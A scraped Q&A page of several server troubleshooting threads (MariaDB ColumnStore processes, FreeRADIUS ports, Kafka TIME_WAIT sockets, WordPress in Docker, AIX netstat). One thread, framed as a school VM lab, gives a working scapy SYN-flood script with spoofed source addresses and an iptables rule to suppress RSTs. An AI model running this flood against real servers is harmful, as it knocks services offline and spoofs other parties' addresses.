MariaDB with ColumnStore spawns a lot of child processes

I'm having a strange issue with a MariaDB Community 10.6 installation with ColumnStore, running on Ubuntu 20.04.
After I start the server and my application begins sending queries to it, the ExeMgr process seems to spawn an endless number of child processes. The count keeps growing and growing, and all of them hold a TCP connection to the MariaDB process, which is somewhat expected, since MariaDB redirects queries to the ColumnStore engine. It's worth mentioning that SELECT, INSERT, UPDATE and DELETE statements are all going to the ColumnStore engine.
This is the output of the netstat command:
. . .
# netstat -anp | grep ExeMgr
tcp 0 0 0.0.0.0:8601 0.0.0.0:* LISTEN 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10090 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:62000 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:11230 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61200 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60304 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60892 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61992 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61038 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61410 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:11680 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60838 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61226 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60474 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:12740 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10986 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10886 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61332 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10068 ESTABLISHED 89497/ExeMgr
. . .
And this is the output of the pstree command; at the moment I captured it, there were already 480 ExeMgr subprocesses running.
My application is a Node.js application and it does have a connection pool, but we are working with a maximum of 5 connections. When I run SHOW PROCESSLIST I can see only 5 connections, as expected.
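To compare the two counts side by side I run something like this (just my rough diagnostic; the grep pattern and the bare mysql call are approximations of what I actually type):
# count ESTABLISHED sockets held by ExeMgr
netstat -anp | grep ExeMgr | grep -c ESTABLISHED
# list client connections as MariaDB itself sees them (the pool should show at most 5)
mysql -e "SHOW PROCESSLIST"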
Has anyone faced this problem? Maybe it is some kind of bug, or a configuration that I missed applying on the server?
Thanks for any help!

Related

Freeradius extra open port

I have a server with many subnets available, and I would like my FreeRADIUS to listen only on specific IP addresses. I use the FreeRADIUS configuration from the Arch package freeradius-3.0.19-3. The only changes are:
removed the IPv6 listen sections
in the IPv4 listen section I set the listening address to ipaddr = "192.168.1.1"
My configuration also has a listener on 127.0.0.1:18120, but when I check the open ports I get:
ss -nlp|grep radiusd
udp UNCONN 0 0 0.0.0.0:40012 0.0.0.0:* users:(("radiusd",pid=22199,fd=9))
udp UNCONN 0 0 127.0.0.1:18120 0.0.0.0:* users:(("radiusd",pid=22199,fd=7))
udp UNCONN 0 0 192.168.1.1:1812 0.0.0.0:* users:(("radiusd",pid=22199,fd=8))
This port 40012 is dynamically allocated; after a restart of the freeradius service the number is different.
ss -nlp|grep radiusd
udp UNCONN 0 0 0.0.0.0:42447 0.0.0.0:* users:(("radiusd",pid=26490,fd=9))
udp UNCONN 0 0 127.0.0.1:18120 0.0.0.0:* users:(("radiusd",pid=26490,fd=7))
udp UNCONN 0 0 192.168.1.1:1812 0.0.0.0:* users:(("radiusd",pid=26490,fd=8))
How do I get rid of this port? What is its function?
This extra port is used for sending and receiving proxy packets. If you are not using proxying, you can disable it in radiusd.conf; look for
proxy_requests = yes
$INCLUDE proxy.conf
Change the setting to "no" and comment out the $INCLUDE line.
If you want to change the address and/or port that is used, look at the listen sections in e.g. raddb/sites-enabled/default. You can add a new section with type = proxy to set the proxy address and port explicitly.
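As a rough sketch of such a section (the address and port here are placeholders, not values from your setup):
listen {
        type = proxy
        ipaddr = 192.168.1.1
        port = 1814
}
With a section like this, the proxy socket binds to a fixed, predictable address and port instead of a randomly allocated one.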

Ubuntu server limits to 5 SYN_RECV

For a school project I'm trying to DoS an Ubuntu server (18.04) from an Ubuntu desktop 18.04 using scapy. Both are VMs in VirtualBox.
On the server side I have a Python SimpleHTTPServer on port 80 that is pingable and reachable via browser from the desktop machine.
I'm trying to DoS it using this code:
#!/usr/bin/env python
import random
import sys
from scapy.all import IP, TCP, send

def sendSYN(target, port):
    # build the IP header with a random (spoofed) source address
    ip = IP()
    ip.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254),
                              random.randint(1, 254), random.randint(1, 254))
    ip.dst = target
    # build the TCP header with a random source port and the SYN flag set
    tcp = TCP()
    tcp.sport = random.randint(1, 65535)
    tcp.dport = port
    tcp.flags = 'S'
    send(ip / tcp)

# check the arguments
if len(sys.argv) != 3:
    print("Usage: %s <target IP> <target port>" % sys.argv[0])
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])
count = 0
print("Launching SYN flood attack at %s:%i." % (target, port))
while 1:
    sendSYN(target, port)
    count += 1
    print("Total packets sent: %i" % count)
    print("==========================================")
which basically sends an infinite number of SYN requests to the target machine on the user-specified port. Its usage is: sudo python pythonDOS.py <target IP> <target port>.
Before launching this I run sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <attacker IP> -j DROP on the attacking machine, to prevent the kernel from sending RST packets.
The attack seems to work: in Wireshark on the attacker machine I can see that the packets are sent correctly, but the server doesn't go down.
Running a netstat -antp | grep 80 on the target server I obtain this output:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 138.221.76.4:24171 SYN_RECV -
tcp 0 0 192.168.1.51:80 164.253.235.187:64186 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
and if I rerun the command after a few seconds:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 100.58.218.121:10306 SYN_RECV -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 47.206.177.213:39759 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
it seems that the server can hold a maximum of 5 connections in SYN_RECV, although I'm sending hundreds of these requests from the attacker machine, so I think this is why I can't DoS the server. ufw is disabled. My objective is to understand what is limiting this on the server and disable it, in order to carry out the DoS attack.
Any help is appreciated, thanks in advance.
UPDATE: I installed tshark on the target server, and from it I can see that all the packets I'm sending are received on the server, so they are not lost in the communication between the two virtual machines. Also, running netstat -i I can see that there are no drops in the RX-DRP column.
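One possible explanation (my assumption, not something I have confirmed): Python's SimpleHTTPServer is built on socketserver.TCPServer, whose default request_queue_size is 5, and that value is passed straight to listen() as the backlog, which would match the 5 half-open connections. A minimal sketch of serving with a larger backlog (Python 3 names):
from http.server import HTTPServer, SimpleHTTPRequestHandler

class BigBacklogHTTPServer(HTTPServer):
    # HTTPServer inherits request_queue_size = 5 from socketserver.TCPServer;
    # it is the backlog argument passed to listen(), i.e. how many pending
    # (half-open) connections the kernel will queue for this socket.
    request_queue_size = 128

BigBacklogHTTPServer(("0.0.0.0", 80), SimpleHTTPRequestHandler).serve_forever()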

Kafka create too many TIME WAIT TCP connection

I use Kafka 0.11.0.3
I have a Kafka broker and a remote Zookeeper cluster. When I start the Kafka server it successfully registers its id in Zookeeper, and I can even get the topic list using the kafka-topics.sh command. The problem is that I repeatedly observe the following lines in the Kafka logs:
[2019-01-08 10:51:09,138] WARN Attempting to send response via channel for which there is no open connection, connection id 192.168.0.201:9092-192.168.0.201:58292 (kafka.network.Processor)
[2019-01-08 10:51:09,198] INFO Creating /controller (is it secure? false) (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,226] INFO Result of znode creation is: OK (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,306] INFO Creating /controller (is it secure? false) (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,327] INFO Result of znode creation is: OK (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,382] WARN Attempting to send response via channel for which there is no open connection, connection id 192.168.0.201:9092-192.168.0.201:58296 (kafka.network.Processor)
[2019-01-08 10:51:09,408] INFO Creating /controller (is it secure? false) (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,446] INFO Result of znode creation is: OK (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,559] INFO Creating /controller (is it secure? false) (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,602] INFO Result of znode creation is: OK (kafka.utils.ZKCheckedEphemeral)
The broker is trying to respond on port 58292 of the same machine (the one the Kafka server is running on), but the connection is no longer open.
I also checked the controller dir on Zookeeper and it was empty.
Even stranger, when I list the TCP connections on the Kafka server node I see a great many TIME_WAIT connections:
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.0.201:55572 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56290 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55442 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55512 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56074 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56286 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55460 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55904 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55488 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56308 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55502 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56326 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55960 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55930 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56300 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56004 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55470 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55474 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55432 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55412 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56304 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55858 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55860 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56324 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55388 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56168 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55898 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55820 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55676 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56202 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55756 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56278 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55658 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55628 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56038 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56108 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55988 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55894 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55428 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55424 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56128 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56146 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55884 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56280 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55798 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56120 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55888 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55708 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55696 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56298 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55646 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56150 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55376 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55980 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55556 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56208 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55752 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55982 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55864 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55760 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56056 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56002 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55536 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55576 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55392 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55726 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55426 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55710 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56042 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56264 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55606 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55972 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56176 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55780 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56342 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55534 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55438 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56114 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56068 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55880 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56350 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55970 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55404 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55672 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55454 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55946 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56126 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55538 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56124 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55712 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56084 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55992 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56302 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55984 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55394 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55550 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56094 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55936 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55530 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55868 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56294 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55876 192.168.0.201:9092 TIME_WAIT -
tcp 0 31 192.168.0.201:57552 192.168.0.204:2181 ESTABLISHED 1015/java
The only successfully established connection is the one to Zookeeper (the last line). I also checked port 9092 from a remote node and it was open:
Starting Nmap 7.01 ( https://nmap.org ) at 2019-01-08 11:32 +0330
Nmap scan report for (192.168.0.201)
Host is up (0.0027s latency).
PORT STATE SERVICE
9092/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
Some points:
The broker had been working fine for about 2 months and the error happened suddenly.
The Zookeeper cluster is working fine, because other components such as HDFS are using it without any errors.
The OS is CentOS 7 and no firewall is enabled.
Here is the Kafka server config:
broker.id=100
listeners=PLAINTEXT://192.168.0.201:9092
num.partitions=24
delete.topic.enable=true
log.dirs=/data/esb
zookeeper.connect=co1:2181,co2:2181
log.retention.hours=168
zookeeper.session.timeout.ms=40000
What can be the cause of all these TIME_WAIT connections?
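To quantify it I count the sockets per state like this (just a quick diagnostic, nothing authoritative):
netstat -ant | awk 'NR > 2 {print $6}' | sort | uniq -c | sort -rn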
I ran into a similar TIME_WAIT issue before; you may want to check your ZooKeeper log, whose default location is:
/bin/zookeeper.out
The cause of my issue was basically a permission problem: I started ZooKeeper as a normal user, but somehow the files under /zkdata were owned by root.
The ZooKeeper log will tell you the reason.
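Roughly what I did to confirm and fix it (the paths and the user name are from my setup, so treat them as assumptions):
ls -l /zkdata                          # check who owns the ZooKeeper data files
tail -n 100 zookeeper.out              # the log states the exact failure
chown -R zookeeper:zookeeper /zkdata   # reclaim ownership if root took it over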

Cannot connect to WordPress docker container on Google Cloud Platform

Ok so I have read the other questions about connecting to a Docker container and mine does not seem to fit any of them. So here it goes. I have installed Docker and Docker Compose. I built the WordPress site on my home machine and am now trying to migrate it to GCP. I got a micro instance and installed everything on there, and as far as I can tell everything is up and running as it should be. But when I go to open the site in a web browser I get:
This site can’t be reached
xx.xxx.xx.xx refused to connect.
Try:
Checking the connection
Checking the proxy and the firewall
ERR_CONNECTION_REFUSED
These are the ports opened up in my .yml file:
- "8000:80"</b>
- "443"</b>
- "22"</b>
I have also tried 8080:80 and 80:80 to no avail,
and when I check docker port it shows:
80/tcp -> 0.0.0.0:32770
80/tcp -> 0.0.0.0:8000
22/tcp -> 0.0.0.0:32771
443/tcp -> 0.0.0.0:443
and when I check netstat from localhost and from another machine I get
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:17600 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:17603 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:17500 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 :::17500 :::* LISTEN -
udp 0 0 0.0.0.0:49953 0.0.0.0:* -
udp 22720 0 0.0.0.0:56225 0.0.0.0:* -
udp 52224 0 127.0.1.1:53 0.0.0.0:* -
udp 19584 0 0.0.0.0:68 0.0.0.0:* -
udp 46080 0 0.0.0.0:17500 0.0.0.0:* -
udp 214144 0 0.0.0.0:17500 0.0.0.0:* -
udp 35072 0 0.0.0.0:5353 0.0.0.0:* -
udp 9216 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp6 0 0 :::44824 :::* -
udp6 16896 0 :::5353 :::* -
udp6 3840 0 :::5353 :::* -
when I run docker ps I get:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
1c25a8707960 wordpress:latest "docker-entrypoint.s…" 37 minutes ago Up 37 minutes 0.0.0.0:443->443/tcp, 0.0.0.0:32771->22/tcp, 0.0.0.0:8000->80/tcp, 0.0.0.0:32770->80/tcp wp-site_wordpress_1
96f3c136c746 mysql:5.7 "docker-entrypoint.s…" 37 minutes ago Up 37 minutes 3306/tcp wp-site_wp-db_1
Also, I have both HTTP and HTTPS open on my Google Cloud firewall.
So if I am listening on port 80 and have it mapped to 8000 (the port I used to reach the container on my dev machine), I do not understand why I cannot get to the WP site in the browser. Any help would be greatly appreciated. I think I have included everything needed for this question; if anything else is needed I will be more than happy to post it.
Ok so after a lot of tries I finally figured it out. In the yml file I needed to take out the port - "80" entry, change - "8000:80" to - "80:80", and then remove the old containers and rebuild them.
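For reference, the ports section ended up looking roughly like this (the 443 and 22 lines are my best guess at the rest of it):
ports:
  - "80:80"
  - "443:443"
  - "22"
followed by removing and recreating the containers:
docker-compose down
docker-compose up -d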

netstat for AIX 6.1

Is there a way to grep for network status based on PID on an AIX box?
I'd like to know if there is a reasonable equivalent of the command below:
netstat -anp | grep 2767
tcp 0 0 :::47801 :::* LISTEN 2767/java
tcp 0 0 :::33830 :::* LISTEN 2767/java
tcp 0 0 :::8009 :::* LISTEN 2767/java
tcp 0 0 :::8080 :::* LISTEN 2767/java
tcp 0 0 ::ffff:15.213.27.40:60373 ::ffff:15.213.27.21:22 ESTABLISHED 2767/java
tcp 0 0 ::ffff:15.213.27.40:35040 ::ffff:15.213.27.99:22 ESTABLISHED 2767/java
2767 being the process ID.
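The closest I have found so far (untested on my AIX 6.1 box, so treat it as a sketch) combines netstat -Aan with rmsock, or uses lsof if it is installed:
netstat -Aan | grep LISTEN       # the first column is the socket's PCB address (AIX netstat does not print PIDs)
rmsock f1000e0000b6b3b8 tcpcb    # map a PCB address (example value) back to the owning process
lsof -a -p 2767 -i               # or, if lsof is installed, list sockets for PID 2767 directly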
